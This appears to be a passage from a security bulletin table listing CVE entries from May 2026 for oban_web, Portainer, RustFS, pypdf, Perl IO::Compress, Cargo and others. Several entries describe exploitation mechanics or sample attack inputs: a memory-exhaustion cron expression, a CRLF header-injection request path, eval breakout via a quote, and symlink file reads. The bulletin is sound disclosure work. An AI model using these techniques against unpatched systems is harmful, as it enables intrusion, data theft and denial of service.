| oban-bg--oban_web | Missing Authorization vulnerability in oban-bg oban_web ('Elixir.Oban.Web.Jobs.DetailComponent' modules) allows unauthorized job worker substitution. The handle_event("save-job", ...) handler in 'Elixir.Oban.Web.Jobs.DetailComponent' does not perform an authorization check, unlike the sibling cancel, delete, and retry handlers which all verify the caller's privileges via can?/2. An authenticated user with :read_only access can push a forged save-job LiveView WebSocket event to overwrite a job's worker field with any other existing Oban.Worker module in the application. On the job's next execution attempt, Oban will invoke perform/1 on the attacker-chosen module instead of the intended one. This issue affects oban_web: from 2.12.0 before 2.12.5. | 2026-05-26 | not yet calculated | CVE-2026-48592 | https://github.com/oban-bg/oban_web/security/advisories/GHSA-389x-rgxr-8m33 https://cna.erlef.org/cves/CVE-2026-48592.html https://osv.dev/vulnerability/EEF-CVE-2026-48592 https://github.com/oban-bg/oban_web/commit/ab3c5d1d3eba06c62045f16f2cd7781c7752e248 |
| oban-bg--oban_web | Uncontrolled Resource Consumption vulnerability in oban-bg oban_web ('Elixir.Oban.Web.CronExpr' modules) allows memory exhaustion via unbounded cron range expansion. An attacker with access to schedule cron jobs can submit a malicious cron expression such as "0 0 1-100000000 * *". When a user with dashboard access views the cron job list, 'Elixir.Oban.Web.CronExpr':describe/1 is called to render the expression. parse_range/1 parses both range endpoints via Integer.parse/1 with no bounds check, and the downstream helpers expand_dom_parts/1 and expand_dow_parts/1 materialise the range eagerly via Enum.to_list/1, causing allocation of ~2.4 GB and stalling or crashing the BEAM node. A sibling helper extract_dom_values already validates range bounds, but the expansion helpers do not. This issue affects oban_web: from 2.12.0 before 2.12.5. | 2026-05-26 | not yet calculated | CVE-2026-48593 | https://github.com/oban-bg/oban_web/security/advisories/GHSA-6xh2-93p9-vqh4 https://cna.erlef.org/cves/CVE-2026-48593.html https://osv.dev/vulnerability/EEF-CVE-2026-48593 https://github.com/oban-bg/oban_web/commit/9998b7e284e02fdd4645dd6231760038e63b584d |
| OnlyOffice--DocSpace | An Insecure Direct Object Reference (IDOR) vulnerability was discovered in ONLYOFFICE DocSpace before 3.2.1. The flaw exists in multiple REST API endpoints. This allows authenticated users with low-level permissions (User or Guest) to retrieve sensitive information, such as the Owner's unique identifier (ID) and profile information, which should only be accessible to administrators. | 2026-05-26 | not yet calculated | CVE-2026-38587 | https://github.com/ONLYOFFICE/DocSpace/blob/master/CHANGELOG.md#security |
| OpenRapid--RapidCMS v1.3.1 | OpenRapid RapidCMS v1.3.1 was discovered to contain an authentication bypass in the /template/default/menu.php component. This vulnerability is exploited via injecting a crafted SQL payload into the name cookie parameter. | 2026-05-27 | not yet calculated | CVE-2026-38930 | http://openrapid.com http://rapidcms.com https://moworn.github.io/post/cve-2026-38930/ |
| openreplay--openreplay | OpenReplay is a self-hosted session replay suite. Prior to 1.26.0, there is a cross-tenant IDOR on feature-flag and assist-stats routes via {project_id} case mismatch. ProjectAuthorizer.__call__ (OSS api/auth/auth_project.py:14-38 and EE ee/api/auth/auth_project.py:14-46) only runs projects.is_authorized(project_id, tenant_id, user_id) + projects.get_project(tenant_id, project_id) when self.project_identifier == "projectId" (camelCase). For EE multi-tenant, feature-flag queries only filter on project_id, never tenant_id. Any authenticated user in tenant A can read/update/delete feature-flag rows belonging to tenant B by iterating the sequential integer project_id + feature_flag_id. OSS is single-tenant by design ({"errors":["tenants already registered"]} on second signup) so there's no cross-tenant impact This vulnerability is fixed in 1.26.0. | 2026-05-28 | not yet calculated | CVE-2026-45297 | https://github.com/openreplay/openreplay/security/advisories/GHSA-5m23-rcj4-cgjx |
| OpenSolution--QuickCMS | QuickCMS allows a user's session identifier to be set before authentication. The value of this session ID stays the same after authentication. This behaviour enables an attacker to fix a session ID for a victim and later hijack the authenticated session. This issue was fixed in a patch to version 6.8 published on 15.05.2026, deployments without this patch are still vulnerable. | 2026-05-29 | not yet calculated | CVE-2026-33384 | https://cert.pl/posts/2026/05/CVE-2026-33384/ https://opensolution.org/home.html |
| OpenSolution--QuickCMS | QuickCMS is vulnerable to Cross-Site Scripting (XSS) through its insecure HTTP-based plugin‑fetching mechanism. A malicious attacker can perform a Man‑in‑the‑Middle (MITM) attack by impersonating the opensolution.org server and serving arbitrary HTML or JavaScript at the plugin list endpoint. When a user accesses the plugin page, the malicious content is automatically fetched, rendered, and executed. This issue was fixed in a patch to version 6.8 published on 15.05.2026, deployments without this patch are still vulnerable. | 2026-05-29 | not yet calculated | CVE-2026-33386 | https://cert.pl/posts/2026/05/CVE-2026-33384/ https://opensolution.org/home.html |
| OpenStack--Neutron | In OpenStack Neutron before 28.0.1, the tagging controller enforces plural policy action names on single-tag write operations while the defined policy rules use singular names. The mismatched names evaluate as allowed under the default policy, permitting a project reader to create and update tags on same-project resources. Deployments running Neutron 26.0.0 or later are affected. | 2026-05-28 | not yet calculated | CVE-2026-49299 | https://bugs.launchpad.net/bugs/2150132 https://review.opendev.org/c/openstack/neutron/+/989099 https://www.openwall.com/lists/oss-security/2026/05/28/8 |
| OpenStack--Swift | In OpenStack Swift before 2.36.2 and 2.37.2, s3api middleware enters an infinite loop when processing a truncated aws-chunked PUT request body. The StreamingInput class repeatedly appends an empty buffer and re-reads, causing the proxy-server worker handling the request to become permanently unresponsive with increasing CPU and memory consumption. An authenticated attacker can systematically exhaust all proxy-server workers, resulting in denial of service. The defect was introduced in Swift 2.36.0. | 2026-05-27 | not yet calculated | CVE-2026-49017 | https://bugs.launchpad.net/bugs/2152205 https://review.opendev.org/c/openstack/swift/+/987957 https://review.opendev.org/c/openstack/swift/+/988093 |
| OpenVPN Inc--OpenVPN Connect | Privilege escalation via background service of OpenVPN Connect 3.5.1 through 3.8.1 on macOS allows attackers to execute arbitrary commands with elevated privileges via local IPC channel | 2026-05-26 | not yet calculated | CVE-2026-9560 | https://openvpn.net/connect-docs/macos-release-notes.html |
| OutSystems--Lifetime | OutSystems Lifetime is vulnerable to Authorization Bypass Through User-Controlled Key vulnerability in ApplicationID parameter. Any authenticated user, can read the Change Log containing actions performed by other users as well as application name of any application. This issue was fixed in OutSystems Lifetime version 11.28.2.3955 | 2026-05-25 | not yet calculated | CVE-2026-40127 | https://cert.pl/en/posts/2026/05/CVE-2026-40126/ https://www.outsystems.com/downloads/ScreenDetails?ReleaseId=22953&MajorVersion=11&ComponentName=LifeTime |
| Pboot--CMS v3.2.11 | PbootCMS v.3.2.11 contains a code injection vulnerability in its site configuration functionality | 2026-05-26 | not yet calculated | CVE-2026-36239 | http://pbootcms.com http://hunan.com https://github.com/TazmiDev/CVE-2026-36239 |
| picoclaw--ExecTool | picoclaw <=v0.1.2 and earlier is vulnerable to OS command injection via the ExecTool component (pkg/tools/shell.go). The guardCommand() function attempts to restrict shell command execution using a denylist of 8 regular expressions, but the denylist is incomplete. | 2026-05-27 | not yet calculated | CVE-2026-36045 | https://github.com/sipeed/picoclaw/releases/tag/v0.1.2 https://gist.github.com/NucleiAv/41899be6266a9813840301577792ed68 |
| PMQS--IO::Compress | IO::Compress versions from 2.207 before 2.220 for Perl ship a zipdetails CLI tool that crashes with undefined subroutine on Info-ZIP Unix Extra Field with 8-byte UID or GID. When decode_ux() in bin/zipdetails handles an Info-ZIP Unix Extra Field (tag 0x7875) with UID Size or GID Size set to 8, causing zipdetails to decode an 8-byte UID or GID value, it dispatches through decodeLitteEndian(), which calls a misnamed helper unpackValueQ. The actual function defined in the same file is unpackValue_Q (with underscore); the call raises 'Undefined subroutine &main::unpackValueQ' and the script exits with status 255. Library callers of IO::Compress and IO::Uncompress are not affected; the defect is in the bundled CLI tool. | 2026-05-27 | not yet calculated | CVE-2026-48961 | https://github.com/pmqs/IO-Compress/commit/33c89d03d6e746ed2ead4f2f6570d47864c61bc7.patch https://metacpan.org/release/PMQS/IO-Compress-2.220/changes |
| PMQS--IO::Compress | IO::Compress versions before 2.220 for Perl can execute arbitrary code in File::GlobMapper via an attacker-controlled output glob. _parseOutputGlob() wraps the caller-supplied output glob string in double quotes and stores it in the parser state; _getFiles() then runs the stored expression through eval STRING. A literal double quote in the output glob closes the dquote wrapper, and the characters that follow are evaluated as Perl. Arbitrary Perl in the output glob executes at the calling process's privilege. | 2026-05-27 | not yet calculated | CVE-2026-48962 | https://github.com/pmqs/IO-Compress/commit/f2db247bf90d4cc7ee2710be384946081f3b4610.patch https://metacpan.org/release/PMQS/IO-Compress-2.220/changes |
| PMQS--IO::Uncompress::Unzip | IO::Uncompress::Unzip versions before 2.215 for Perl propagate uncaught exception when parsing zip header with malformed DOS date. _dosToUnixTime() decodes the local-file-header last-modification date field and calls Time::Local::timelocal() without an eval guard. A header whose date field decodes to an out-of-range month, day, or hour causes timelocal() to die. The exception propagates out of IO::Uncompress::Unzip->new($file) where callers expect undef plus $UnzipError. | 2026-05-27 | not yet calculated | CVE-2025-15649 | https://github.com/pmqs/IO-Compress/commit/fd28c1d2374eee9811f6d0c5bddc0957abdf1da8.patch https://github.com/pmqs/IO-Compress/issues/65 https://metacpan.org/release/PMQS/IO-Compress-2.215/changes |
| PMQS--IO::Uncompress::Unzip | IO::Uncompress::Unzip versions before 2.220 for Perl allow CPU exhaustion via per-byte read loop in fastForward. fastForward() compares length $offset (the digit count of the offset, 1 to 19) against the chunk size $c instead of $offset itself, so $c shrinks from 16 KiB to 1-19 bytes per iteration. Extracting a named entry from an attacker supplied zip via IO::Uncompress::Unzip->new($zip, Name => $target) drives a per-byte read loop scaling with the entry's compressed size, up to the non-Zip64 4 GiB cap. | 2026-05-27 | not yet calculated | CVE-2026-48959 | https://github.com/pmqs/IO-Compress/commit/68db44076f4c1a86a2ffe53a958eac6cabaf72e2.patch https://metacpan.org/release/PMQS/IO-Compress-2.220/changes |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, The Docker plugin management endpoints (/plugins/*) were not registered with a handler, so standard users with endpoint access could call privileged plugin operations - including installing and enabling plugins - directly against the underlying Docker daemon. The vulnerability is exposed when a non-admin Portainer user (Standard User role, or any role granted endpoint-level access) has been given access to a Docker endpoint via Portainer RBAC. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | not yet calculated | CVE-2026-44848 | https://github.com/portainer/portainer/security/advisories/GHSA-rrmm-9v76-h3p4 |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, Portainer enforces seven EndpointSecuritySettings restrictions that administrators configure to restrict the container configurations non-admin users can launch: privileged mode, host PID namespace, device mapping, capabilities, sysctls, security-opt (Seccomp / AppArmor), and bind mounts. These restrictions are enforced on the standard container creation path, but several of them are not applied on the Docker Swarm service API. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | not yet calculated | CVE-2026-44849 | https://github.com/portainer/portainer/security/advisories/GHSA-5fxq-qcf3-244w |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, Portainer supports deploying stacks from Git repositories. When a Git-backed stack is created or updated, Portainer clones the repository using go-git v5, which translates Git blob entries with mode 0o120000 (symlink) into real OS symlinks on the host filesystem via os.Symlink. The only entry blocked from becoming a symlink is .gitmodules; every other path is created as a symlink without validation. Portainer's GET /api/stacks/{id}/file endpoint then reads the stack entry point with os.ReadFile, which follows OS symlinks transparently. A repository containing docker-compose.yml as a symlink to an arbitrary filesystem path causes the symlink target's contents to be returned verbatim in the HTTP response. Any authenticated user with rights to create or update a Git-backed stack - the default configuration in Portainer CE - can read arbitrary files accessible to the Portainer process. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | not yet calculated | CVE-2026-44881 | https://github.com/portainer/portainer/security/advisories/GHSA-rpgq-m5fp-32wr |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, Portainer's authentication middleware accepts JWT bearer tokens passed as the ?token=<JWT> URL query parameter on any authenticated API endpoint, in addition to the standard Authorization: Bearer header. URLs are recorded in reverse-proxy access logs, browser history, and HTTP Referer headers on outbound navigation, so any JWT passed this way can be harvested by anyone with access to those logs or by an external site the user subsequently visits. A leaked token grants the full privileges of the user it was issued to, until the token expires (default 8 hours, configurable). The ?token= parameter was used by Portainer's browser-based container attach, exec, and pod shell features, so any user with exec or attach rights on a container was exposed - not only administrators. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | not yet calculated | CVE-2026-44883 | https://github.com/portainer/portainer/security/advisories/GHSA-jvp4-q659-95mj |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8 and 2.39.1, a missing authorization vulnerability in the Custom Template file endpoint (GET /api/custom_templates/{id}/file) allows any authenticated user to read the file content of any custom template by enumerating sequential integer IDs, bypassing Resource Control access restrictions. Template files may contain environment-specific values such as connection strings, API tokens, or registry credentials that administrators would not expect standard users to read. This vulnerability is fixed in 2.33.8 and 2.39.1. | 2026-05-28 | not yet calculated | CVE-2026-44884 | https://github.com/portainer/portainer/security/advisories/GHSA-cqpq-2fgr-8mvc |
| Portainer--Portainer Community Edition | Insecure default settings of Portainer CE grant regular (non-admin) users privileges that allow host filesystem access and host-level code execution. An authenticated non-administrative user with endpoint access can exploit these settings to read host files or obtain root equivalent access on the host. | 2026-05-28 | not yet calculated | CVE-2026-33590 | https://intwave.com/blog/2026/02/26/improving-portainer-security.html https://github.com/portainer/portainer/commit/ac8fa7672e732b44b970c9eaf928eddd2c68796c https://github.com/portainer/portainer/commit/3e2fdb1891e81a8e4c5c8beb60e45f07c8ecae52 |
| pretix--pretix | When creating an export through the pretix API, API clients are returned an UUID value for their export job (a long, random string like 35742818-c375-4d15-839f-d49aecce94d6). Using this UUID, the API client can then request the actual file for download. The same kind of UUID is used in other places in pretix when temporary files are generated for internal use or download. One remaining API endpoint, however, wrongfully did not verify if the UUID used for download actually belongs to a file that is supposed to be downloadable and belongs to the correct user. In reality, this is hard to exploit because an attacker would need to have access to a valid UUID for the file they desire which is unlikely to happen without a separate security problem giving them access to logs etc. | 2026-05-27 | not yet calculated | CVE-2026-9712 | https://pretix.eu/about/en/blog/20260527-release-2026-4-2/ |
| prometheus--prometheus | Prometheus is an open-source monitoring system and time series database. From 2.49.0 to before 3.5.3 and 3.11.3, in the Prometheus server's legacy web UI (enabled via the command-line flag --enable-feature=old-ui), the histogram heatmap chart view does not escape le label values when inserting them into the HTML for use as axis tick mark labels. An attacker who can inject crafted metrics can execute JavaScript in the browser of any Prometheus user who views the metric in the heatmap chart UI. This vulnerability is fixed in 3.5.3 and 3.11.3. | 2026-05-26 | not yet calculated | CVE-2026-44903 | https://github.com/prometheus/prometheus/security/advisories/GHSA-fw8g-cg8f-9j28 https://github.com/prometheus/prometheus/commit/38f23b9075ced1de2b82d2dad8b2bebb1ecd5b7d |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to 6.12.0, an attacker who uses this vulnerability can craft a PDF which leads to large memory usage. This requires extracting text in layout mode with large character offsets. This vulnerability is fixed in 6.12.0. | 2026-05-28 | not yet calculated | CVE-2026-48155 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-cj93-chg6-vgv8 https://github.com/py-pdf/pypdf/pull/3790 https://github.com/py-pdf/pypdf/releases/tag/6.12.0 |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to 6.12.0, an attacker who uses this vulnerability can craft a PDF which leads to long runtimes. This requires cross-reference streams with /W [0 0 0] values and large /Size values. This vulnerability is fixed in 6.12.0. | 2026-05-28 | not yet calculated | CVE-2026-48156 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-248m-82v9-q6g6 https://github.com/py-pdf/pypdf/pull/3791 https://github.com/py-pdf/pypdf/releases/tag/6.12.0 |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to 6.12.1, an attacker who uses this vulnerability can craft a PDF which leads to large memory usage. This requires parsing large XMP metadata, possibly with lots of unnecessary elements. This vulnerability is fixed in 6.12.1. | 2026-05-28 | not yet calculated | CVE-2026-48735 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-wjqc-6w8f-h24c https://github.com/py-pdf/pypdf/pull/3796 https://github.com/py-pdf/pypdf/releases/tag/6.12.1 |
| QOS.CH Sarl--logback | Deserialization of untrusted data vulnerability in QOS.CH Sarl logback logback-core (HardenedObjectInputStream (logback-core) modules) allows Object Injection albeit heavily restricted. More precisely, an attacker able to influence serialized data sent to SimpleSocketServer or SimpleSSLSocketServer can instantiate objects from classes in the java.lang and java.util packages that are not explicitly blocked. Although deserialization is heavily restricted by HardenedObjectInputStream and no practical way to achieve remote code execution or significant privilege escalation has been identified, this issue constitutes a bypass of the intended security restrictions. This issue affects logback: through 1.5.32 inclusive. | 2026-05-28 | not yet calculated | CVE-2026-9828 | https://logback.qos.ch/news.html#1.5.33 |
| rabbitmq--rabbitmq-server | RabbitMQ is a messaging and streaming broker. From 4.2.0 to before 4.2.4, RabbitMQ's MQTT plugin allows for topic-level authorization using regular expressions with variable substitution. Administrators can create patterns such as ^{client_id}-sensors$ to restrict user access to topics that include their client ID. However, the client_id is provided by the user in the MQTT CONNECT packet and is inserted into the regex pattern without escaping special regex characters. This flaw enables an authenticated MQTT user to inject regex operators to bypass authorization. This vulnerability is fixed in 4.2.4 and 4.3.0. | 2026-05-27 | not yet calculated | CVE-2026-44838 | https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-x866-xp2g-cx8v |
| rabbitmq--rabbitmq-server | RabbitMQ is a messaging and streaming broker. From 3.7.0 to before 4.1.2 and 4.0.13, This vulnerability is fixed in 4.1.2 and 4.0.13. | 2026-05-27 | not yet calculated | CVE-2026-44839 | https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-fh5r-jpm3-fjwp https://github.com/rabbitmq/rabbitmq-server/commit/7f54319279d1ece161ae0b4cdc6f0e58a4045eb5 |
| randombit--botan | Botan is a C++ cryptography library. Prior to 3.12.0, certain patterns of indefinite length encodings in BER data could cause quadratic behavior in the parser, resulting in a denial of service. Such BER encodings were accepted even in structures which are required to be encoded as DER, which prohibits indefinite length encodings. This vulnerability is fixed in 3.12.0. | 2026-05-27 | not yet calculated | CVE-2026-44378 | https://github.com/randombit/botan/security/advisories/GHSA-7q2v-3g27-6g3j |
| Raynet--Rvia | Command injection in Raynet rvia 12.6.4392.49-amd64.deb allows adversaries to execute commands via getconfig, and upload through the URL argument, and oracle through the -o flag The Supplier's perspective is that this is caused by Argument Injection in the find command query in rvia 12.6.4392.49. This in an arbitrary code execution flaw caused by an incorrectly constructed find command. The application actively searches for a Java executable by using search criteria that is not properly terminated or sanitized. By constructing a crafted directory path that satisfies the malformed search criteria, an attacker can trick the application into executing arbitrary Java code. This differs from standard PATH manipulation because it stems from the application's internal search logic. Specifically, a local attacker can create a crafted directory structure and path that satisfies an improperly terminated find query used by the application to locate a Java runtime. | 2026-05-27 | not yet calculated | CVE-2025-69600 | https://support.raynet.de/hc/en-us/articles/19518792826132-RVY200865-RayVentory-12-6 https://github.com/Wise-Security/CVE-2025-69600 |
| Raynet--Rvia | Command injection in Raynet rvia version 12.6 Update 8 and previous versions allows adversaries to execute arbitrary code via a crafted path that matches the improperly terminated search criteria of rvia's Java search using the find command. | 2026-05-27 | not yet calculated | CVE-2026-38945 | https://support.raynet.de/ https://github.com/Wise-Security/CVE-2026-38945 |
| Remote Spark (https://www.remotespark.com/)--SparkView | Path traversal vulnerability in Remote Spark (https://www.Remotespark.Com/) SparkView allows reading and writing arbitrary files in all directories as root. This leads to RCE. The affected component is the RDP drive redirection. Depending on implementation, the vulnerability can be exploited by an unauthenticated attacker. This issue affects SparkView: before build 1127. | 2026-05-29 | not yet calculated | CVE-2026-8326 | https://www.remotespark.com/view/new.html |
| Responsive File Manager--Responsive File Manager | An issue in Responsive File Manager Responsive File Manager Version 9.14.0 allows a remote attacker to execute arbitrary code via the force_download.php component | 2026-05-28 | not yet calculated | CVE-2026-37266 | https://www.responsivefilemanager.com/ https://csacyber.com/blog/responsive-filemanager-version-9-14-0-multiple-vulnerabilities-cve-2026-37266 |
| Rocket.Chat--Rocket.Chat | The Rocket.Chat DDP method autoTranslate.translateMessage in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.5, <7.13.8, and <7.10.12 accepts a client-supplied IMessage object and passes it directly to translateMessage() without checking Meteor.userId() or verifying room membership. Any authenticated DDP user can read the content of any message by ID from any room (private channels, DMs, E2EE rooms) by calling this method. | 2026-05-28 | not yet calculated | CVE-2026-32995 | https://hackerone.com/reports/3734326 https://github.com/RocketChat/Rocket.Chat/pull/40528 |
| RRWO--Mojolicious::Plugin::Statsd | Mojolicious::Plugin::Statsd versions through 0.04 for Perl allowed metric injections. The metric names and set values were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. Version 0.06 changes the module from being a statsd client to using a separate statsd client. It defaults to using a version of Net::Statsd::Tiny that fixes a similar issue (CVE-2026-46720). | 2026-05-26 | not yet calculated | CVE-2026-46740 | https://metacpan.org/release/RRWO/Mojolicious-Plugin-Statsd-0.06/changes https://github.com/robrwo/perl-Mojolicious-Plugin-Statsd/commit/f049156982a2c0b8050f173e24a04a29ddd64853.patch https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| RRWO--Plack::Middleware::Security::Common | Plack::Middleware::Security::Common versions before 0.13.1 for Perl did not block header injections in request paths. The header injection rule was ineffective at blocking header injections in the request paths unless they were double-encoded, for example, GET /path\r\nHTTP/1.1\r\nHost: secret.example.com Note that it is unclear whether request paths with CRLF followed by additional headers would be blocked by reverse proxies, or how they would be processed by Plack-based servers. | 2026-05-28 | not yet calculated | CVE-2026-9658 | https://metacpan.org/release/RRWO/Plack-Middleware-Security-Simple-v0.13.1/changes |
| Rust Project--Cargo | Cargo incorrectly handled symlinks inside of crate tarballs downloaded from third-party registries, allowing a malicious crate to override the source code of another crate from the same registry. The severity of the vulnerability is **medium** for users of third-party registries. Users of crates.io are **not affected**, as crates.io forbids uploading crates containing any symlink. | 2026-05-25 | not yet calculated | CVE-2026-5223 | https://groups.google.com/g/rustlang-security-announcements/c/IB74S7Yksg8 https://blog.rust-lang.org/2026/05/25/cve-2026-5223/ https://github.com/rust-lang/cargo/pull/17031 |
| Rust--Cargo | Cargo between 1.68 and 1.96 incorrectly normalized the URLs of third-party registries using the sparse index protocol. If a hosting provider allowed multiple registries to be hosted with arbitrary names within the same domain, an attacker able to publish crates in a registry could obtain the credentials of others users of the same registry. The severity of the vulnerability is **low**, due to the extremely niche requirements needed to achieve the attack. | 2026-05-25 | not yet calculated | CVE-2026-5222 | https://groups.google.com/g/rustlang-security-announcements/c/SfUxOiIdY5s https://blog.rust-lang.org/2026/05/25/cve-2026-5222/ https://github.com/rust-lang/cargo/pull/17031 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, RustFS suffers from sensitive information leakage in log outputs. When the server is run with RUST_LOG=debug sensitive credentials including SessionToken (JWT), SecretAccessKey, and full JWT claims are printed in plaintext to the server logs. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-45040 | https://github.com/rustfs/rustfs/security/advisories/GHSA-8cm2-h255-v749 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, crates/appauth/src/token.rs ships a 2048-bit RSA private key as a string constant named TEST_PRIVATE_KEY and uses it in production via parse_license() to "verify" license tokens. Because the key is embedded in every published source release and binary, anyone who can read the repository or extract it from the binary can mint arbitrary license tokens (any subject, any expiration). When the license Cargo feature is enabled, this defeats the entire license-enforcement mechanism. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-45041 | https://github.com/rustfs/rustfs/security/advisories/GHSA-923g-jp7v-f97f |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, improper authorization in the UploadPartCopy operation allows copying objects across buckets without enforcing destination bucket restrictions on allowed copy sources. The implementation validates GetObject permission on the source bucket and PutObject on the destination bucket independently, but does not enforce any policy constraints on whether the destination bucket permits the specified copy source. This enables unauthorized cross-bucket data movement. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-45042 | https://github.com/rustfs/rustfs/security/advisories/GHSA-wfxj-ph3v-7mjf |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, improper validation in the PUT /rustfs/admin/v3/import-iam endpoint allows a user with ImportIAMAction to create service accounts under arbitrary parent identities, including the root user (minioadmin). The endpoint accepts attacker-controlled parent, claims, accessKey, and secretKey values without enforcing privilege boundaries or sanitization. This enables privilege escalation to full administrative access using a persistent, attacker-defined credential. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-29 | not yet calculated | CVE-2026-45043 | https://github.com/rustfs/rustfs/security/advisories/GHSA-566f-q62r-wcr8 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, the admin router explicitly whitelists /profile/cpu and /profile/memory from the authentication layer, allowing any unauthenticated HTTP client to invoke profiling handlers without credentials. On supported builds (e.g., glibc), the handler invokes a fixed 60-second CPU profiling operation (dump_cpu_pprof_for(Duration::from_secs(60))). This may result in significant CPU resource consumption per request and can potentially lead to denial of service when abused. Additionally, the handler returns the server's absolute filesystem path in the response body, resulting in information disclosure. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-45044 | https://github.com/rustfs/rustfs/security/advisories/GHSA-8784-9m7f-c6p6 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, when RUSTFS_CORS_ALLOWED_ORIGINS is unset, the RustFS S3 listener's ConditionalCorsLayer reflects any request Origin value back as Access-Control-Allow-Origin and also sets Access-Control-Allow-Credentials: true and Access-Control-Allow-Headers: * on responses, including preflight responses and error responses. This creates a permissive cross-domain policy with untrusted origins. A browser visiting an attacker-controlled page can issue credentialed cross-origin requests to a reachable RustFS deployment and read the response when the victim browser has ambient credentials for the RustFS origin, such as saved HTTP Basic Auth credentials, reverse-proxy SSO cookies, or TLS client certificates. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-46685 | https://github.com/rustfs/rustfs/security/advisories/GHSA-x5xv-223c-8vm7 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, the RustFS console endpoint GET /rustfs/console/license returns parsed license metadata without requiring authentication. The endpoint is registered on the console listener and returns JSON containing license information such as the license subject and expiration timestamp. Any client that can reach the console listener can query this endpoint without credentials. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-47136 | https://github.com/rustfs/rustfs/security/advisories/GHSA-xp32-gxq2-3v52 |
| SailingLab--AppLock | SailingLab AppLock (aka com.alpha.applock) 4.3.8 for Android allows a local attacker with physical access to bypass the PIN lock. The lock is implemented as an overlay rather than by using Android's secure authentication APIs. By navigating cascading interface flows - insecure navigation through exposed routes facilitates app control evasion {I.N.T.E.R.F.A.C.E] via advertisement or browser intents - an attacker can evade lockscreen verification and access protected apps (e.g., Chrome). This results in information disclosure and privilege escalation. | 2026-05-26 | not yet calculated | CVE-2025-68708 | https://play.google.com/store/apps/details?id=com.alpha.applock https://github.com/actuator/com.alpha.applock https://github.com/actuator/com.alpha.applock/blob/main/CVE-2025-68708 |
| SailingLab--Applock | SailingLab AppLock (aka com.alpha.applock) 4.3.8 for Android allows a local attacker to trigger arbitrary JavaScript execution via BrowserMainActivity, which accepts VIEW intents with javascript: URIs. This unsafe navigation path results in script execution and may allow UI spoofing or privilege escalation. | 2026-05-26 | not yet calculated | CVE-2025-68709 | https://play.google.com/store/apps/details?id=com.alpha.applock https://github.com/actuator/com.alpha.applock https://github.com/actuator/com.alpha.applock/blob/main/CVE-2025-68709 |
| SHAY--perl | Perl versions through 5.43.10 have a heap buffer overflow when compiling regular expressions with a repeated fixed string on 32-bit builds. Perl_study_chunk in regcomp_study.c checked the size of the joined substring buffer in characters rather than bytes. For a quantified fixed substring with a large minimum count, the byte length mincount * l could overflow SSize_t, producing an undersized SvGROW allocation; the subsequent copy writes past the end of the buffer. A caller that compiles an attacker-controlled regular expression on a 32-bit perl build triggers a heap buffer overflow at compile time. | 2026-05-25 | not yet calculated | CVE-2026-8376 | https://github.com/Perl/perl5/commit/5e7f119eb2bb1181be908701f22bf7068e722f1c.patch |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, when fetch(url) throws, the code sends: res.status(500).send('Error occurred while trying to proxy to: ' + url + ' ' + error). The url value is attacker-controlled (req.params.url) and is not HTML-escaped before rendering. This vulnerability is fixed in 1.18.0. | 2026-05-29 | not yet calculated | CVE-2026-44651 | https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-xc4x-2452-5gc9 |
